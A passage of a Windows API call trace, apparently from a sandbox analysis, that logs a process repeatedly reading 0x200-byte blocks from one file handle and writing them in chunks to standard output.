lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.078] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.078] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.078] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 
[0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.079] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.079] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, 
lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] GetFileType (hFile=0x50) returned 0x1 [0193.079] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.079] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: 
lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.080] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.080] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] GetFileType (hFile=0x50) returned 0x1 [0193.080] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.080] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.081] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.081] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] 
GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] GetFileType (hFile=0x50) returned 0x1 [0193.081] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.081] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 
[0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.082] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.082] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] GetFileType (hFile=0x50) returned 0x1 [0193.082] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.082] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.083] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.083] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] GetFileType (hFile=0x50) returned 0x1 [0193.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.083] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType 
(hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.084] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.084] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.084] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.084] GetFileType (hFile=0x50) returned 0x1 [0193.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, 
lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] GetFileType (hFile=0x50) returned 0x1 [0193.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.085] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.085] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.085] SetFilePointerEx (in: 